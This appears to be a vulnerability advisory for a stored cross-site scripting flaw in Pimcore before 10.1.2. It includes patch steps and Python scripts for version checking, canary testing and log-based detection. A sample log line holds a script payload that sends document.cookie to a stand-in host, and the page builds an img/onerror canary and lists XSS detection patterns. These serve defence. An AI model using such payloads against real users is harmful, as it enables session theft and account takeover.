CVE-2021-39170

8.0 HIGH

📋 TL;DR

CVE-2021-39170 is a stored cross-site scripting (XSS) vulnerability in Pimcore. An authenticated user with permission to edit asset metadata can store script in a custom metadata field; the value is later rendered without output encoding, so when another user opens the asset in the admin interface the script runs in that user's browser with that user's session. All Pimcore installations prior to version 10.1.2 are affected; exploitation needs an account that can edit asset metadata, which makes administrators who review editors' work the natural targets.

💻 Affected Systems

Products:
  • Pimcore
Versions: All versions prior to 10.1.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated user with permission to edit asset metadata. The flaw is in the custom metadata functionality for assets.

📦 What is this software?

Pimcore is an open-source, PHP/Symfony-based platform that combines product information management (PIM), master data management (MDM), digital asset management (DAM) and web content management (CMS). Editors and administrators share the same admin interface, which is what makes a stored XSS in asset metadata attractive to an attacker holding a low-privileged account.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A low-privileged but authenticated attacker plants a payload that an administrator later views. The script runs with the administrator's session and can steal session cookies (where they are not marked HttpOnly), perform actions through the admin interface as that user, deface the interface, or redirect the user to a malicious site, potentially leading to full account compromise and data theft.

🟠 Likely Case

An attacker with a legitimate editor account uses the payload to hijack the sessions of colleagues or administrators who open the asset, read data shown in their interface, or issue requests on their behalf, effectively escalating from editor rights to the victim's privileges.

🟢 If Mitigated

With output encoding applied where metadata values are rendered (and input validation as a second layer), the payload is displayed as inert text rather than executed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account that can edit asset metadata; no unauthenticated path is known. The advisory and the fixing pull request identify the vulnerable code path, so constructing a working payload is straightforward.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.1.2

Vendor Advisory: https://github.com/pimcore/pimcore/security/advisories/GHSA-2v88-qq7x-xq5f

Restart Required: No

Instructions:

1. Update Pimcore to version 10.1.2 or later via Composer (or your usual deployment method).
2. Confirm that the installed version is 10.1.2 or later.
3. Clear the application cache so the patched code is actually used.

🔧 Temporary Workarounds

Manual patch application

linux

Apply the fix from the upstream pull request without upgrading the whole Pimcore installation. Download the patch first and review it, then run a dry run from the directory the patch paths are relative to (for a Composer-managed install that is vendor/pimcore/pimcore). The next composer install or update overwrites the patched files, so treat this as a stopgap until you can move to 10.1.2.

curl -fsSL -o pr-10178.patch https://github.com/pimcore/pimcore/pull/10178.patch
(cd vendor/pimcore/pimcore && patch -p1 --dry-run < ../../../pr-10178.patch && patch -p1 < ../../../pr-10178.patch)

🧯 If You Can't Patch

  • Restrict permission to edit asset metadata to trusted administrators; because exploitation requires that permission, this removes the attacker's entry point rather than merely filtering payloads
  • Add WAF rules that block script tags, event-handler attributes and javascript: URIs in metadata update requests, as defence in depth only: such rules are routinely bypassed with encoding and alternative tags

🔍 How to Verify

Check if Vulnerable:

Check whether the installed Pimcore version is below 10.1.2. If you need behavioural confirmation rather than a version number, store a harmless HTML fragment in a custom metadata field on an asset and check whether the admin interface renders it unencoded.

Check Version:

php bin/console pimcore:version
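For fleets of Pimcore projects it is usually quicker to read the version out of each project's composer.lock than to log in and run console commands on every host. The script below is an added example written for this page, not Pimcore's own tooling; it assumes the standard Composer lock format (a "packages" / "packages-dev" list with "name" and "version" keys), uses 10.1.2 from this page as the fixed release, and embeds a constructed lock excerpt as sample input. It treats a pre-release of 10.1.2 as unfixed and refuses to guess for branch aliases such as 10.x-dev.

```python
"""Added example: flag Pimcore installs older than 10.1.2 from composer.lock."""
import json
import re
import sys

FIXED = (10, 1, 2)  # first release carrying the fix for CVE-2021-39170

# Constructed composer.lock excerpt for demonstration; not taken from a real project.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "symfony/console", "version": "v5.3.7"},
        {"name": "pimcore/pimcore", "version": "v10.1.1"},
    ],
    "packages-dev": [],
})

VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?(\+[0-9A-Za-z.]+)?$")


def parse_version(tag):
    """Turn 'v10.1.1' or '10.1.2-RC1' into ((10, 1, 1), is_prerelease).

    A '-suffix' marks a pre-release; a '+build' suffix does not affect ordering.
    Branch aliases such as '10.x-dev' or 'dev-master' raise ValueError.
    """
    m = VERSION_RE.match(tag.strip())
    if not m:
        raise ValueError(f"unrecognised version tag: {tag!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    return core, m.group(4) is not None


def is_vulnerable(tag):
    """True when the tag predates the 10.1.2 release."""
    core, prerelease = parse_version(tag)
    if core < FIXED:
        return True
    # A pre-release of 10.1.2 itself was cut before the final release, so treat it as unfixed.
    return core == FIXED and prerelease


def installed_pimcore_version(lock_text):
    """Return the pimcore/pimcore version recorded in a composer.lock, or None."""
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == "pimcore/pimcore":
                return pkg["version"]
    return None


def check_lock(lock_text):
    """One-line verdict for a composer.lock document."""
    version = installed_pimcore_version(lock_text)
    if version is None:
        return "pimcore/pimcore not found in composer.lock"
    try:
        vulnerable = is_vulnerable(version)
    except ValueError:
        return f"pimcore/pimcore {version}: branch or unrecognised version, check the commit manually"
    status = "VULNERABLE" if vulnerable else "fixed"
    return f"pimcore/pimcore {version}: {status} (fix in 10.1.2)"


if __name__ == "__main__":
    # Usage: python check_pimcore_lock.py /path/to/composer.lock
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCK
    print(check_lock(text))
```

Run it against each project's composer.lock; the lock file records what is actually installed, whereas composer.json only records the constraint.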

Verify Fix Applied:

After patching, store a harmless canary payload (for example an img tag with an onerror attribute carrying a unique token) in a custom asset metadata field, open the asset as a different user, and confirm that the value is displayed as escaped text and no script runs. Judge the rendered HTML or DOM, not only a raw JSON API response, since a metadata value may legitimately travel unencoded in JSON and be encoded at render time.
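Deciding "did the payload come back encoded or live" by eye is error-prone, so the following added example (written for this page, not part of Pimcore) builds a canary payload with a searchable token and classifies a captured response body. The response snippets it checks are constructed stand-ins for the asset detail view before and after patching; the canary shape (an img tag with an onerror attribute) and the token prefix are this example's own choices.

```python
"""Added example: judge whether a canary XSS payload came back encoded or live."""
import html
import re
import secrets


def make_canary(token=None):
    """Harmless but recognisable payload; the token lets you find it in logs and responses."""
    token = token or f"cve39170_{secrets.token_hex(4)}"
    return f'<img src=x onerror="{token}">', token


def payload_state(response_html, token):
    """Classify how the canary appears in a response body.

    'live'    -> an <img ...> tag carrying the token survived verbatim (still vulnerable)
    'encoded' -> it survived only as &lt;img ...&gt; text (output encoding works)
    'altered' -> the token is present but the tag was rewritten or stripped (inspect by hand)
    'absent'  -> the token is not in the response at all (value stripped, or wrong page)
    """
    if token not in response_html:
        return "absent"
    if re.search(r"<img\b[^>]*" + re.escape(token), response_html):
        return "live"
    if re.search(r"&lt;img\b[^<]*" + re.escape(token), response_html):
        return "encoded"
    return "altered"


def sample_pages(payload):
    """Constructed stand-ins for the asset metadata table before and after the patch."""
    before = f'<tr><td>copyright</td><td class="metadata">{payload}</td></tr>'
    after = f'<tr><td>copyright</td><td class="metadata">{html.escape(payload)}</td></tr>'
    return before, after


if __name__ == "__main__":
    payload, token = make_canary()
    before, after = sample_pages(payload)
    print("canary:   ", payload)
    print("unpatched:", payload_state(before, token))
    print("patched:  ", payload_state(after, token))
```

In a real test, replace the constructed pages with the HTML your browser actually rendered (for example saved from the developer tools) and feed the same token to payload_state; an 'altered' result means a sanitizer changed the value and deserves a manual look rather than a pass.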

📡 Detection & Monitoring

Log Indicators:

  • Metadata updates whose values contain script tags, event-handler attributes (onerror=, onload= and similar) or javascript: URIs, including HTML-entity or URL-encoded forms
  • Several such writes from one account within a short period, which suggests payload testing

Network Indicators:

  • Browsers of users viewing assets in the admin interface making requests to unfamiliar external hosts, consistent with cookie or data exfiltration

SIEM Query:

source="pimcore" AND ("metadata" OR "asset") AND ("<script>" OR "javascript:" OR "onerror=" OR "onload=")

This query matches only literal, unencoded tokens in whatever fields your Pimcore logs expose. HTML-entity or URL-encoded payloads (&lt;script&gt;, %3Cscript%3E) and event handlers other than the two listed slip through, so decode values before matching, or alert on any HTML markup at all in metadata fields if your editors never legitimately store it.
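The substring query above is the baseline; the added example below (written for this page, not Pimcore's own code) shows the detection logic a practitioner would actually want: decode HTML entities and URL encoding before matching, look for event-handler attributes generically rather than two fixed names, and count repeated flagged writes per account. The log lines are constructed for the example and follow a made-up key=value layout; Pimcore's real log format is not implied, so adapt the field extraction to whatever your application or audit log records.

```python
"""Added example: flag asset metadata writes that carry XSS-style markup, after decoding."""
import html
import re
from urllib.parse import unquote

# Constructed audit-style log lines (not a real Pimcore log format): one metadata write per line.
SAMPLE_LOG = """\
2021-09-01T10:02:11Z user=editor1 asset=1042 action=metadata.update name=title value="Summer campaign"
2021-09-01T10:03:45Z user=editor2 asset=1042 action=metadata.update name=copyright value="<script>fetch('//x.example/c?'+document.cookie)</script>"
2021-09-01T10:05:02Z user=editor2 asset=1043 action=metadata.update name=alt value="%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
2021-09-01T10:06:30Z user=editor2 asset=1044 action=metadata.update name=alt value="&lt;svg onload=alert(1)&gt;"
2021-09-01T10:07:10Z user=editor3 asset=1050 action=metadata.update name=desc value="Click here: javascript:void(0)"
2021-09-01T10:08:00Z user=editor1 asset=1051 action=metadata.update name=desc value="Bold &lt;b&gt;text&lt;/b&gt; is fine"
"""

# Indicators checked against the decoded value. Plain formatting tags such as <b> are not flagged.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(?:img|svg|iframe|body|input|video|audio|details|object|embed)\b[^>]*\bon\w+\s*=", re.I),
    re.compile(r"\bon(?:error|load|focus|mouseover|toggle|click)\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
]

VALUE_RE = re.compile(r'value="(.*)"$')
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def normalise(value, rounds=3):
    """Undo URL encoding and HTML entities (a few rounds) so encoded payloads surface."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev = value
        value = html.unescape(unquote(value))
    return value


def scan_line(line):
    """Return a finding dict for a suspicious metadata write, or None."""
    m = VALUE_RE.search(line)
    if not m:
        return None
    decoded = normalise(m.group(1))
    hits = [p.pattern for p in XSS_PATTERNS if p.search(decoded)]
    if not hits:
        return None
    fields = dict(FIELD_RE.findall(line.split(" value=")[0]))
    return {
        "user": fields.get("user"),
        "asset": fields.get("asset"),
        "name": fields.get("name"),
        "decoded": decoded,
        "matched": hits,
    }


def scan_log(text):
    """All findings in a log text, in file order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


def repeat_offenders(hits, threshold=2):
    """Accounts with several flagged writes: the 'multiple attempts' indicator above."""
    counts = {}
    for h in hits:
        counts[h["user"]] = counts.get(h["user"], 0) + 1
    return sorted(user for user, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f"{f['user']} asset={f['asset']} field={f['name']}: {f['decoded']}")
    print("repeat offenders:", repeat_offenders(findings))
```

Expect false positives wherever editors legitimately paste rich HTML into metadata; tune XSS_PATTERNS to your content rather than loosening the decoding step, which is what lets the encoded variants on lines three and four be caught at all.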
